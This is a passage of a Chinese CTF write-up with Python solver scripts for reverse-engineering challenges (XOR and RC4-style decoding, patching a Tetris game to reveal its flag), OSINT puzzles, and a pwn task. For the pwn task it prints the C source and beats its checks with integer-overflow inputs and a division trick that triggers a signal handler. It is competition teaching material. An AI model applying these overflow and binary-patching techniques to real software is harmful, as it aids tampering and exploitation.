0x68A7ED, 0x68F577, 0x68F657, 0x68FE4B, 0x693CA7, 0x69442D, 0x6991B7, 0x699297, 0x699A8B, 0x69D8E7, 0x69E06D, 0x6A2DF7, 0x6A2ED7, 0x6A36CB, 0x6A7527, 0x6A7CAD, 0x6ACA37, 0x6ACB17, 0x6AD30B, 0x6B1167, 0x6B18ED, 0x6B6677, 0x6B6757, 0x6B6F4B, 0x6B7013, 0x6B70DB, 0x6B71A3, 0x6B726B, 0x6B7333, 0x6B73FB, 0x6B74C3, 0x6B758B, 0x6B7653, 0x6B771B, 0x6B771C, 0x6B771D, 0x6B771E, 0x6B771F, 0x6B7720, 0x6B7721, 0x6B7722, 0x6B7723, 0x6B7724, 0x6B7725, 0x6B7726, 0x6B7727, 0x6B7728, 0x6B7729, 0x6B772A, 0x6B772B, 0x6B772C, 0x6B772D, 0x6B772E, 0x6B772F, 0x6B7730, 0x6B7731, 0x6B7732, 0x6B7733, 0x6B7734, 0x6B7735, 0x6B7736, 0x6B7737, 0x6B7738, 0x6B7739, 0x6B773A, 0x6B773B, 0x6B773C, 0x6B773D, 0x6B773E, 0x6B773F, 0x6B7740, 0x6B7741, 0x6B7742, 0x6B7743, 0x6B7744, 0x6B7745, 0x6B7746, 0x6B7747, 0x6B7748, 0x6B7749, 0x6B774A, 0x6B774B, 0x6B774C, 0x6B774D, 0x6B774E, 0x6B774F, 0x6B7750, 0x6B7751, 0x6B7752, 0x6B7753, 0x6B7754, 0x6B7755, 0x6B7756, 0x6B7757, 0x6B7758, 0x6B7759, 0x6B775A, 0x6B775B, 0x6B775C, 0x6B775D, 0x6B775E, 0x6B775F, 0x6B7760, 0x6B7761, 0x6B7762, 0x6B7763, 0x6B7764, 0x6B7765, 0x6B7766, 0x6B7767, 0x6B7768, 0x6B7769, 0x6B776A, 0x6B776B, 0x6B776C, 0x6B776D, 0x6B776E, 0x6B776F, 0x6B7770, 0x6B7771, 0x6B7772, 0x6B7773, 0x6B7774, 0x6B7775, 0x6B7776, 0x6B7777, 0x6B7778, 0x6B7779, 0x6B777A, 0x6B777B, 0x6B777C, 0x6B777D, 0x6B777E, 0x6B777F, 0x6B7780, 0x6B7781, 0x6B7782, 0x6B7783, 0x6B7784, 0x6B7785, 0x6B7786, 0x6B7787, 0x6B7788, 0x6B7789, 0x6B778A, 0x6B778B, 0x6B778C, 0x6B778D, 0x6B778E, 0x6B778F, 0x6B7790, 0x6B7791, 0x6B7792, 0x6B7793, 0x6B7794, 0x6B7795, 0x6B7796, 0x6B7797, 0x6B7798, 0x6B7799, 0x6B779A, 0x6B779B, 0x6B779C, 0x6B779D, 0x6B779E, 0x6B779F, 0x6B77A0, 0x6B77A1, 0x6B77A2, 0x6B77A3, 0x6B77A4, 0x6B77A5, 0x6B77A6, 0x6B77A7, 0x6B786F, 0x6B7937, 0x6B79FF, 0x6B7AC7, 0x6B7B8F, 0x6B7C57, 0x6B7D1F, 0x6B7DE7, 0x6B7EAF, 0x6B7F77, 0x6B803F, 0x6B8107, 0x6B81CF, 0x6B8297, 0x6B835F, 0x6B8427, 0x6B84EF, 0x6B85B7, 0x6B867F, 0x6B8747, 0x6B880F, 0x6B88D7, 0x6B899F, 0x6B8A67, 0x6B8B2F, 0x6B8BF7, 0x6B8CBF, 0x6B8D87, 0x6B8E4F, 0x6B8F17, 0x6B8FDF, 0x6B90A7, 0x6B916F, 0x6B9237, 0x6B92FF, 0x6B93C7, 0x6B948F, 0x6B9557, 0x6B961F, 0x6B96E7, 0x6B97AF, 0x6B9877, 0x6B993F, 0x6B9A07, 0x6B9ACF, 0x6B9B97, 0x6B9C5F, 0x6B9D27, 0x6B9DEF, 0x6B9EB7, 0x6B9F7F, 0x6BA047, 0x6BA10F, 0x6BA1D7, 0x6BA29F, 0x6BA367, 0x6BA42F, 0x6BA4F7, 0x6BA5BF, 0x6BA687, 0x6BA74F, 0x6BA817, 0x6BA8DF, 0x6BA9A7, 0x6BAA6F, 0x6BAB37, 0x6BABFF, 0x6BACC7, 0x6BAD8F, 0x6BADA7, 0x6BAE57, 0x6BAF1F, 0x6BAFE7, 0x6BB0AF, 0x6BB177, 0x6BB23F, 0x6BB307, 0x6BB3CF, 0x6BB497, 0x6BB52D, 0x6BB55F, 0x6BB627, 0x6BB6EF, 0x6BB7B7, 0x6BB87F, 0x6BB947, 0x6BBA0F, 0x6BBAD7, 0x6BBB9F, 0x6BBC67, 0x6BBD2F, 0x6BBDF7, 0x6BBEBF, 0x6BBF87, 0x6BC04F, 0x6BC117, 0x6BC1DF, 0x6BC2A7, 0x6BC36F, 0x6BC437, 0x6BC4FF, 0x6BC5C7, 0x6BC68F, 0x6BC757, 0x6BC81F, 0x6BC8E7, 0x6BC9AF, 0x6BCA77, 0x6BCB3F, 0x6BCC07, 0x6BCCCF, 0x6BCD97, 0x6BCE5F, 0x6BCF27, 0x6BCFEF, 0x6BD0B7, 0x6BD17F, 0x6BD247, 0x6BD30F, 0x6BD3D7, 0x6BD49F, 0x6BD567, 0x6BD62F, 0x6BD6F7, 0x6BD7BF, 0x6BD887, 0x6BD94F, 0x6BDA17, 0x6BDADF, 0x6BDBA7, 0x6BDC6F, 0x6BDD37, 0x6BDDFF, 0x6BDEC7, 0x6BDF8F, 0x6BE057, 0x6BE11F, 0x6BE1E7, 0x6BE2AF, 0x6BE377, 0x6BE43F, 0x6BE507, 0x6BE5CF, 0x6BE697, 0x6BE75F, 0x6BE827, 0x6BE8EF, 0x6BE9B7, 0x6BEA7F, 0x6BEB47, 0x6BEC0F, 0x6BECD7, 0x6BED9F, 0x6BEE67, 0x6BEF2F, 0x6BEFF7, 0x6BF0BF, 0x6BF187, 0x6BF24F, 0x6BF317, 0x6BF3DF, 0x6BF4A7, 0x6BF56F, 0x6BF637, 0x6BF6FF, 0x6BF7C7, 0x6BF88F, 0x6BF957, 0x6BFA1F, 0x6BFAE7, 0x6BFBAF, 0x6BFC77, 0x6BFD3F, 0x6BFE07, 0x6BFECF, 0x6BFF97, 0x6C005F, 0x6C0127, 0x6C01EF, 0x6C02B7, 0x6C0397, 0x6C49E7, 0x6C4AAF, 0x6C4B77, 0x6C4C3F, 0x6C4D07, 0x6C4DCF, 0x6C4E97, 0x6C4F5F, 0x6C5027, 0x6C50EF, 0x6C516D, 0x6C51B7, 0x6C527F, 0x6C5347, 0x6C540F, 0x6C54D7, 0x6C559F, 0x6C5667, 0x6C572F, 0x6C57F7, 0x6C58BF, 0x6C5987, 0x6C5A4F, 0x6C5B17, 0x6C5BDF, 0x6C5CA7, 0x6C5D6F, 0x6C5E37, 0x6C5EFF, 0x6C5FC7, 0x6C608F, 0x6C6157, 0x6C621F, 0x6C62E7, 0x6C63AF, 0x6C6477, 0x6C653F, 0x6C6607, 0x6C66CF, 0x6C6797, 0x6C685F, 0x6C6927, 0x6C69EF, 0x6C6AB7, 0x6C6B7F, 0x6C6C47, 0x6C6D0F, 0x6C6DD7, 0x6C6E9F, 0x6C6F67, 0x6C702F, 0x6C70F7, 0x6C71BF, 0x6C7287, 0x6C734F, 0x6C7417, 0x6C74DF, 0x6C75A7, 0x6C766F, 0x6C7737, 0x6C77FF, 0x6C78C7, 0x6C798F, 0x6C7A57, 0x6C7B1F, 0x6C7BE7, 0x6C7CAF, 0x6C7D77, 0x6C7E3F, 0x6C7F07, 0x6C7FCF, 0x6C8097, 0x6C815F, 0x6C8227, 0x6C82EF, 0x6C83B7, 0x6C847F, 0x6C8547, 0x6C860F, 0x6C86D7, 0x6C879F, 0x6C8867, 0x6C892F, 0x6C89F7, 0x6C8ABF, 0x6C8B87, 0x6C8C4F, 0x6C8D17, 0x6C8DDF, 0x6C8EA7, 0x6C8F6F, 0x6C9037, 0x6C90FF, 0x6C91C7, 0x6C928F, 0x6C9357, 0x6C941F, 0x6C94E7, 0x6C95AF, 0x6C9677, 0x6C973F, 0x6C9807, 0x6C98CF, 0x6C9997, 0x6C9A5F, 0x6C9B27, 0x6C9BEF, 0x6C9CB7, 0x6C9D7F, 0x6C9E47, 0x6C9F0F, 0x6C9FD7, 0x6CEDAD, 0x6D8271, 0x6D8339, 0x6D8401, 0x6D84C9, 0x6D8591, 0x6D8659, 0x6D8721, 0x6D87E9, 0x6D88B1, 0x6D8979, 0x6D897A, 0x6D897B, 0x6D897C, 0x6D897D, 0x6D897E, 0x6D897F, 0x6D8980, 0x6D8981, 0x6D8982, 0x6D8983, 0x6D8984, 0x6D8985, 0x6D8986, 0x6D8987, 0x6D8988, 0x6D8989, 0x6D898A, 0x6D898B, 0x6D898C, 0x6D898D, 0x6D898E, 0x6D898F, 0x6D8990, 0x6D8991, 0x6D8992, 0x6D8993, 0x6D8994, 0x6D8995, 0x6D8996, 0x6D8997, 0x6D8998, 0x6D8999, 0x6D899A, 0x6D899B, 0x6D899C, 0x6D899D, 0x6D899E, 0x6D899F, 0x6D89A0, 0x6D89A1, 0x6D89A2, 0x6D89A3, 0x6D89A4, 0x6D89A5, 0x6D89A6, 0x6D89A7, 0x6D89A8, 0x6D89A9, 0x6D89AA, 0x6D89AB, 0x6D89AC, 0x6D89AD, 0x6D89AE, 0x6D89AF, 0x6D89B0, 0x6D89B1, 0x6D89B2, 0x6D89B3, 0x6D89B4, 0x6D89B5, 0x6D89B6, 0x6D89B7, 0x6D89B8, 0x6D89B9, 0x6D89BA, 0x6D89BB, 0x6D89BC, 0x6D89BD, 0x6D89BE, 0x6D89BF, 0x6D89C0, 0x6D89C1, 0x6D89C2, 0x6D89C3, 0x6D89C4, 0x6D89C5, 0x6D89C6, 0x6D89C7, 0x6D89C8, 0x6D89C9, 0x6D89CA, 0x6D89CB, 0x6D89CC, 0x6D89CD, 0x6D89CE, 0x6D89CF, 0x6D89D0, 0x6D89D1, 0x6D89D2, 0x6D89D3, 0x6D89D4, 0x6D89D5, 0x6D89D6, 0x6D89D7, 0x6D89D8, 0x6D89D9, 0x6D89DA, 0x6D89DB, 0x6D89DC, 0x6D89DD, 0x6D89DE, 0x6D89DF, 0x6D89E0, 0x6D89E1, 0x6D89E2, 0x6D89E3, 0x6D89E4, 0x6D89E5, 0x6D89E6, 0x6D89E7, 0x6D89E8, 0x6D89E9, 0x6D89EA, 0x6D89EB, 0x6D89EC, 0x6D89ED, 0x6E1EB1, 0x6EBAF1, 0x6F5731, 0x6FF371, 0x708FB1, 0x712BF1, 0x71C831, 0x726471, 0x7300B1, 0x739CF1, 0x743931, 0x74D571, 0x7571B1, 0x760DF1, 0x76AA31, 0x774671, 0x77E2B1, 0x787EF1, 0x791B31, 0x79B771, 0x79B839, 0x79B901, 0x79B9C9, 0x79BA91, 0x79BB59, 0x79BC21, 0x79BCE9, 0x79BDB1, 0x79BE79, 0x79BF41, 0x79C009, 0x79C0D1, 0x79C199, 0x79C261, 0x79C329, 0x79C3F1, 0x79C4B9, 0x79C581, 0x79C649, 0x79C711, 0x79C7D9, 0x79C8A1, 0x79C969, 0x79CA31, 0x79CAF9, 0x79CBC1, 0x79CC89, 0x79CD51, 0x79CE19, 0x79CEE1, 0x79CFA9, 0x79D071, 0x79D139, 0x79D201, 0x79D2C9, 0x79D391, 0x79D459, 0x79D521, 0x79D5E9, 0x79D6B1, 0x79D779, 0x79D841, 0x79D909, 0x79D9D1, 0x79DA99, 0x79DB61, 0x79DC29, 0x79DCF1, 0x79DDB9, 0x79DE81, 0x79DF49, 0x79E011, 0x79E0D9, 0x79E1A1, 0x79E269, 0x79E331, 0x79E3F9, 0x79E4C1, 0x79E589, 0x79E651, 0x79E719, 0x79E7E1, 0x79E8A9, 0x79E971, 0x79EA39, 0x79EB01, 0x79EBC9, 0x79EC91, 0x79ED59, 0x79EE21, 0x79EEE9, 0x79EFB1, 0x79F079, 0x79F141, 0x79F209, 0x79F2D1, 0x79F399, 0x79F461, 0x79F529, 0x79F5F1, 0x79F6B9, 0x79F781, 0x79F849, 0x79F911, 0x79F9D9, 0x79FAA1, 0x79FB69, 0x79FC31, 0x79FCF9, 0x79FDC1, 0x79FE89, 0x79FF51, 0x7A0019, 0x7A00E1, 0x7A01A9, 0x7A0271, 0x7A0339, 0x7A0401, 0x7A04C9, 0x7A0591, 0x7A0659, 0x7A0721, 0x7A07E9, 0x7A08B1, 0x7A0979, 0x7A0A41, 0x7A0B09, 0x7A0BD1, 0x7A0C99, 0x7A0D61, 0x7A0E29, 0x7A0EF1, 0x7A0FB9, 0x7A1081, 0x7A1149, 0x7A114A, 0x7A114B, 0x7A114C, 0x7A114D, 0x7A114E, 0x7A114F, 0x7A1150, 0x7A1151, 0x7A1152, 0x7A1153, 0x7A1154, 0x7A1155, 0x7A1156, 0x7A1157, 0x7A1158, 0x7A1159, 0x7A115A, 0x7A115B, 0x7A115C, 0x7A115D, 0x7A115E, 0x7A115F, 0x7A1160, 0x7A1161, 0x7A1162, 0x7A1163, 0x7A1164, 0x7A1165, 0x7A1166, 0x7A1167, 0x7A1168, 0x7A1169, 0x7A116A, 0x7A116B, 0x7A116C, 0x7A116D, 0x7A116E, 0x7A116F, 0x7A1170, 0x7A1171, 0x7A1172, 0x7A1173, 0x7A1174, 0x7A1175, 0x7A1176, 0x7A1177, 0x7A1178, 0x7A1179, 0x7A117A, 0x7A117B, 0x7A117C, 0x7A117D, 0x7A117E, 0x7A117F, 0x7A1180, 0x7A1181, 0x7A1182, 0x7A1183, 0x7A1184, 0x7A1185, 0x7A1186, 0x7A1187, 0x7A1188, 0x7A1189, 0x7A118A, 0x7A118B, 0x7A118C, 0x7A118D, 0x7A118E, 0x7A118F, 0x7A1190, 0x7A1191, 0x7A1192, 0x7A1193, 0x7A1194, 0x7A1195, 0x7A1196, 0x7A1197, 0x7A1198, 0x7A1199, 0x7A119A, 0x7A119B, 0x7A119C, 0x7A119D, 0x7A119E, 0x7A119F, 0x7A11A0, 0x7A11A1, 0x7A11A2, 0x7A11A3, 0x7A11A4, 0x7A11A5, 0x7A11A6, 0x7A11A7, 0x7A11A8, 0x7A11A9, 0x7A11AA, 0x7A11AB, 0x7A11AC, 0x7A11AD, 0x7A11AE, 0x7A11AF, 0x7A11B0, 0x7A11B1, 0x7A11B2, 0x7A11B3, 0x7A11B4, 0x7A11B5, 0x7A11B6, 0x7A11B7, 0x7A11B8, 0x7A11B9, 0x7A11BA, 0x7A11BB, 0x7A11BC, 0x7A11BD, 0x7A11BE, 0x7A11BF, 0x7A11C0, 0x7A11C1, 0x7A11C2, 0x7A11C3, 0x7A11C4, 0x7A11C5, 0x7A11C6, 0x7A11C7, 0x7A11C8, 0x7A11C9, 0x7A11CA, 0x7A11CB, 0x7A11CC, 0x7A11CD, 0x7A11CE, 0x7A11CF, 0x7A11D0, 0x7A11D1, 0x7A11D2, 0x7A11D3, 0x7A11D4, 0x7A11D5, 0x7A11D6, 0x7A11D7, 0x7A11D8, 0x7A11D9, 0x7A11DA, 0x7A11DB, 0x7A11DC, 0x7A11DD, 0x7A11DE, 0x7A11DF, 0x7A11E0, 0x7A11E1, 0x7A11E2, 0x7A11E3, 0x7A11E4, 0x7A11E5, 0x7A11E6, 0x7A11E7, 0x7A11E8, 0x7A11E9, 0x7A11EA, 0x7A11EB, 0x7A11EC, 0x7A11ED, 0x7A11EE, 0x7A11EF, 0x7A11F0, 0x7A11F1, 0x7A11F2, 0x7A11F3, 0x7A11F4, 0x7A11F5, 0x7A11F6, 0x7A11F7, 0x7A11F8, 0x7A11F9, 0x7A11FA, 0x7A11FB, 0x7A11FC, 0x7A11FD, 0x7A11FE, 0x7A11FF]

main(199,199,199)
print('Spirit{'+''.join(['RLFBUD'[x] for x in q[2:][::-1]])+'}')

CrackMe from:(Astrageldon)

exp

'''
E-Decompiler: https://github.com/fjqisba/E-Decompiler
Debug a few times and watch the "sum" variable. Then guess!

Ps. Wtf is *(double *)L""
'''

a=[26,43,60,77,94,111,112,0x81,0x92,0xa3,0xb4,0xc5,0xd6,0xe7,0xf8,9,26,43]
print(bytes(a).hex().upper())

GoodCoding from:(Astrageldon)

折叠框的标题

a1 = b"Simple.Game.of.Reverse,+SO+EASY!"
b3=[0]*256
v4 = 256
v3 = len(a1)
v14= [0]*256
v13= [0]*256
for i in range(256):
    v14[i] = i
    v13[i] = a1[i%v3]
v9,v6=0,0
while v9<256:
    v11=v14[v9]
    v6=(v6+v11+v13[v9])%256
    v14[v9]=v14[v6]
    v14[v6]=v11
    v9+=1
v14=[78, 197, 4, 106, 15, 145, 173, 40, 21, 218, 174, 126, 75, 214, 172, 195, 245, 53, 117, 250, 129, 7, 61, 127, 234, 124, 151, 247, 97, 196, 89, 123, 108, 120, 251, 10, 42, 180, 100, 118, 54, 57, 59, 242, 67, 227, 6, 142, 237, 22, 8, 208, 43, 90, 46, 86, 96, 55, 191, 32, 31, 92, 103, 132, 52, 171, 25, 91, 223, 164, 19, 27, 76, 153, 87, 51, 139, 229, 81, 165, 111, 29, 160, 85, 156, 80, 201, 236, 39, 138, 133, 28, 207, 144, 136, 183, 5, 230, 235, 190, 16, 252, 93, 60, 34, 221, 137, 162, 198, 243, 143, 12, 194, 169, 128, 63, 71, 69, 26, 155, 0, 20, 24, 224, 147, 182, 192, 213, 101, 205, 241, 228, 212, 33, 17, 204, 44, 217, 210, 47, 206, 255, 203, 231, 95, 193, 248, 1, 84, 65, 188, 35, 49, 187, 225, 177, 232, 220, 176, 199, 56, 45, 134, 254, 66, 148, 154, 146, 166, 189, 119, 98, 13, 215, 70, 130, 88, 181, 135, 11, 99, 238, 74, 3, 83, 200, 168, 102, 72, 9, 18, 77, 175, 121, 68, 116, 178, 246, 122, 186, 38, 41, 110, 30, 167, 107, 158, 161, 253, 37, 36, 79, 179, 219, 105, 115, 152, 14, 226, 2, 131, 112, 157, 222, 109, 211, 82, 62, 159, 50, 216, 239, 149, 202, 64, 114, 244, 48, 140, 23, 125, 141, 58, 249, 233, 170, 113, 94, 184, 150, 73, 185, 240, 209, 163, 104]
v8,v5,j=0,0,0
while 1:
    if j>=v4: break
    v8=(v8+1)%256
    v12=v14[v8]
    v5=(v5+v12)%256
    v14[v8]=v14[v5]
    v14[v5]=v12
    #a3[j]^=v14[(v14[v8]+v12)%256]
    b3[j]=v14[(v14[v8]+v12)%256]
    j+=1
#print(b3)
#[102, 227, 191, 54, 109, 117, 158, 89, 209, 160, 58, 94, 69, 14, 209, 214, 188, 46, 57, 227, 46, 13, 108, 135, 105, 103, 69, 48, 129, 44, 226, 207, 77, 166, 47, 54, 56, 110, 206, 128, 169, 92, 144, 8, 131, 232, 2, 190, 184, 143, 50, 231, 36, 2, 165, 116, 211, 248, 179, 0, 173, 54, 187, 121, 182, 172, 17, 88, 97, 242, 243, 27, 13, 101, 1, 142, 136, 81, 40, 8, 19, 103, 159, 23, 138, 140, 83, 23, 67, 156, 82, 240, 167, 210, 123, 206, 3, 253, 1, 94, 135, 25, 95, 144, 109, 71, 168, 184, 143, 145, 56, 173, 50, 58, 39, 68, 104, 42, 202, 113, 133, 109, 115, 156, 55, 52, 255, 105, 72, 94, 83, 63, 129, 11, 193, 233, 232, 122, 33, 37, 164, 37, 141, 80, 81, 19, 216, 169, 25, 41, 89, 126, 84, 64, 108, 187, 34, 232, 201, 202, 77, 160, 138, 98, 254, 213, 253, 118, 158, 51, 40, 97, 130, 206, 194, 182, 166, 43, 132, 9, 1, 160, 61, 76, 153, 183, 252, 113, 42, 78, 100, 194, 147, 38, 202, 86, 40, 153, 122, 26, 58, 169, 250, 245, 70, 201, 25, 185, 104, 75, 202, 158, 220, 21, 121, 193, 123, 255, 236, 72, 190, 25, 203, 12, 117, 248, 131, 215, 180, 181, 242, 149, 234, 169, 32, 9, 128, 60, 252, 86, 188, 141, 201, 163, 133, 17, 154, 216, 24, 212, 182, 251, 87, 235, 23, 177]

print(bytes([x^b3[i] for i,x in enumerate(list(b'\x00\x8f\xde\x51\x16\x27\xad\x35\xb4\xe1\x49\x6d\x1a\x58\xe5\xa4\xcf\x1f\x56\xad\x5d\x52\x32\xd8\x28\x15\x76\x14\xf2\x1c\xbd\xa6\x03\xd4\x1c\x40\x5d\x1c\xfb\xe1\xeb\x30\xed\x29\xfe'))])[:-2])

#flag{R3leAs3_V4rs1oNs_^_Ar3$s0_iNr3ver5aBl}

Tetris

俄罗斯方块，IDA打开后逐个查看函数，找到一个显示flag的函数

按x查找引用

汇编下将1000改成0，然后应用patch（Edit>Patch Program>Apply Patches to）

运行可得flag

一击致命

shift + f12找到一个fakeflag

双击点进去然后x查看引用

有异或，我们点进去查看异或表

一个24字节，扔到py里面跑一下就可以

1
2
3

flag = list(b'flag{th1s_i5_a_fak3flag}')
mask = bytes.fromhex('0000000000230d5d106f045000356f39320841575e521000')
print("".join(chr(f^m) for f,m in zip(flag,mask)))

flag{Welc0me_T0_Scr123w}

MineSweeping

emmmmm的题，IDA打开此处即为判断是否开了10颗雷的地方，dword_40A8B8就是已扫雷的数量，查找该变量的改变的地方，有两个inc增加的地方，其中第二个函数sub_401510

展示了flag的变化过程，每次去表里拿一串异或表，然后循环异或

python模拟一下过程

xor_dataS = [
    'sdkgjklsdjkfnmxcv',
    'sdsdbityjksjdfjjk',
    'nkclkvklfbfdpogod',
    'yijfghjkkflgjhkld',
    'uretyqytweyuiywet',
    'lvklkfgkhhgjfghkm',
    'sdfsdhkgfnxcbvxmc',
    'oporyopsrtpyoirto',
    'uiwerjgdfnhndfgop',
    'dfkklhklhkfdfjgkd',
]
raw = list(bytes.fromhex('50'+'6b'+'7f'+'64'+'64'+'7a'+'7b'+'89'+'6e'+'21'+'72'+'4f'+'24'+'6d'+'58'+'ca'+'92'+'8d'+'98'+'88'+'93'+'78'+'86'+'2d'+'70'+'27'+'54'+'65'+'c4'+'99'+'6c'+'78'))
print(len(raw))
print("".join([chr(i) for i in raw]))
for xor_data in xor_dataS:
    print('    xor =',xor_data)
    v4 = len(xor_data)
    for i in range(len(raw)):
        raw[i] ^= i + ord(xor_data[i % v4])
    print("".join([chr(i) for i in raw]))
# Spirit{wh4t_4n_1nterest1n9_g4me}

BabyRE

IDAAAAAAAAAAAAAAA

while ( 1 )
{
    text_67("%d", &v);
    if ( (unsigned int)v > 9 )
        printf("\nNumber in the wrong size!\n");
    else
        s = 10 * s + v;
    if ( s == 875116608 )
        printf("Spirit{md5(YourInput)}(length == 32 and AllLowerCase)");
}

每次读一个数字然后*10，也就是输一遍

1 2	import hashlib print('Spirit{'+hashlib.md5(b'875116608').hexdigest()+'}')

ezJar

jdgui打开

Spirit{开头wel3ome_tO_ja4a!}结尾

Osint

维基百科吉林大学高清图像，flag是吉林大学校歌

Monument

根据苹果树的~~土味海报~~可以找到

分别做base64和Unicode转义得到

_9o0d_luck_tw0_u_by_0verf10w

never_g1ve_up

拼接得Spirit{that_1s_the_fun_0f_ctf_never_g1ve_up_9o0d_luck_tw0_u_by_0verf10w}

CanCanWord from:(Astrageldon)

😡😡😡😡😡😡😡😡😡😡

飞常准
根据GPS以及图片右下角推测是上海到大连或者大连到上海
通过大连航空推测是中国国航
根据2023-08-26的航班座位图，然后你就猜吧😋，左边靠窗的共六种可能性😊

flag{CA895419C}

红星os

进去看评论，有人说up的水印可以用某个repo解密出来，GitHub搜索redstar os，找到一个redstar tool的仓库，里面有个watermark目录，里面是解密脚本，把up的文件16进制后面的那些部分写道文件里面，然后调用脚本解密即可

Pwn

test ur nc

linux下netcat命令（nc ip 端口）

Strange Graphics

查看源码

code

#include <stdio.h>
#include <stdlib.h>

void my_init() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stderr, NULL, _IONBF, 0);
}
void pass(){
    printf("You are a real drawing master!!!");
    system("cat /flag");
    exit(0);
}
int sub_rectangle(){
    int width;
    int length;
    printf("The first is a rectangle:\n");
    printf("Its length > 9,its width > 9 and its circumference <18.\n");
    printf("Your show time:\n");
    printf("The lenth you draw:");
    scanf("%d",&length);
    printf("The width you draw:");
    scanf("%d",&width);
    if (width>9&&length>9&&width+length<9)
        return 1;
    else return 0;
}
int sub_cuboid(){
    int length;
    int width;
    int height;
    printf("\nThe second is a cuboid:\n");
    printf("Its length > 9,its width > 9 ,its height > 4,and its volume =9.\n");
    printf("Your show time:\n");
    printf("The lenth you draw:");
    scanf("%d",&length);
    printf("The width you draw:");
    scanf("%d",&width);
    printf("The height you draw:");
    scanf("%d",&height);
    if(length>9&&width>9&&height>4&&length*width*height==9)
        return 1;
    else return 0;
}
int sub_rightTriangle(){
    int base;
    int height;
    printf("\nThe third is a right triangle:\n");
    printf("Its base is not zero and its height/base will signal an ERROR\n");
    printf("Your show time:\n");
    printf("The base you draw:");
    scanf("%d",&base);
    printf("The height you draw:");
    scanf("%d",&height);
    int v;
    if(base){
        signal(8,pass);
        v=height/base;
        signal(8,0LL);}
    else return 0;
}
int main(){
    my_init();
    printf("Wecome to the SSSCTF!\n");
    printf("Only use integers(int):\n");
    printf("Can you draw three traditional geometric figures for me?\n");
    if(sub_rectangle()&&sub_cuboid()&&sub_rightTriangle()){
    printf("See you later!");
    }
    else
        printf("Your drawing is so bad!");
    return 0;
}

长宽大于0，加起来小于零=>整数溢出，给一个很大很大的数就好了：2147483647，100
length>9&&width>9&&height>4&&length*width*height==9

还是溢出（-2147483648+2147483647+10）== 9
(2147483647+1)+2147483647+10 == 9
4294967305 == 9

```python
d = 4294967305//5 # 858993461
for i in range(1,2147483647):
if d % i==0:
print(i,d//i,i<=2147483647)


  + 4294967305 == 9629 * 89209 * 5 done

3. 第三个要发生溢出，-2147483648 / -1 即可

# Game

## Pacman

~~你或许可以试试原地站着不动~~

查看源代码，搜flag

```js
if (mode === 'hard') {
    showWindow('YOU WIN! The flag is :\n flag{PaCM@n_1S_@_V3rY_C1AS5IcAl_G@mE!}');
}

Crossy Road

你可以试试正攻，我是做不到】

修改代码让他一步到胃

FlyBird

请把小鸟按到天上

讷讷！讷讷！

Welcome

Web

signin

你喜欢鸣濑白羽吗

baby_php

1

2, 3

4,5

ez_web

ez_sql

pin

ez_web2

AI Security

curve from:(Astrageldon)

poisonous from:(Astrageldon)

Misc

基于chatgpt的lora调制 from:(Astrageldon)

NOT 2048 from:(Astrageldon)

在哪里呢 from:(Astrageldon)

国庆快乐

不想做作业

尊嘟假嘟

zys的套题生成器

## ⭕⭕❌❌

⭕⭕❌❌⭕⭕❌❌⭕⭕❌❌⭕⭕❌❌⭕⭕❌❌⭕⭕❌❌⭕⭕❌❌⭕⭕❌❌⭕⭕❌❌⭕⭕❌❌⭕⭕❌❌⭕⭕❌❌

Long.py

弄脏的pdf

qrcode signin

baby qrcode - stage 1

Crypto

Base_Game

ezStream

ezCrypto

cryptoSign

Reverse

Medium Pyc from:(Astrageldon)

Everywhere from:(Astrageldon)

3Dmaze from:(Astrageldon)

CrackMe from:(Astrageldon)

GoodCoding from:(Astrageldon)

Tetris

一击致命

MineSweeping

BabyRE

ezJar

Osint

Signin

Monument

CanCanWord from:(Astrageldon)

红星os

Pwn

test ur nc

Strange Graphics

Crossy Road

FlyBird

本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可

本作品采用知识共享署名-相同方式共享 4.0 国际许可协议进行许可